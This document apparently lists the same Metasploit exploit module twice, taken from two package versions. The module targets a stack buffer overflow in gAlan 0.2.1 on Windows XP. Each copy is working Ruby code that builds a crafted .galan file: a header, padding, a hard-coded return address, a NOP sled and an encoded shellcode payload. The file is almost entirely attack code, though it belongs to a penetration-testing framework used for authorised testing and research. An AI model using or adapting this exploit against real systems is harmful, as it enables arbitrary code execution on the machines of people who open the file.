==> metasploit-5.0.73-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/windows/fileformat/galan_fileformat_bof.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'gAlan 0.2.1 Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in gAlan 0.2.1
      by creating a specially crafted galan file.

      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Jeremy Brown <0xjbrown41[at]gmail.com>',
          'loneferret',
        ],
      'References' =>
        [
          [ 'OSVDB', '60897' ],
          [ 'EDB', '10339' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP Universal', { 'Ret' => 0x100175D0} ], 		# 0x100175D0 call esi @ glib-1_3
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Dec 07 2009',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.galan']),
      ])
  end


  def exploit

    sploit = "Mjik"
    sploit << rand_text_alpha_upper(1028)
    sploit << [target.ret].pack('V')
    sploit << "\x90" * 45
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)

  end
end

==> metasploit-6.0.15-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/windows/fileformat/galan_fileformat_bof.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'gAlan 0.2.1 Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in gAlan 0.2.1
      by creating a specially crafted galan file.

      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Jeremy Brown <0xjbrown41[at]gmail.com>',
          'loneferret',
        ],
      'References' =>
        [
          [ 'OSVDB', '60897' ],
          [ 'EDB', '10339' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP Universal', { 'Ret' => 0x100175D0} ], 		# 0x100175D0 call esi @ glib-1_3
        ],
      'Privileged' => false,
      'DisclosureDate' => '2009-12-07',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.galan']),
      ])
  end


  def exploit

    sploit = "Mjik"
    sploit << rand_text_alpha_upper(1028)
    sploit << [target.ret].pack('V')
    sploit << "\x90" * 45
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)

  end
end
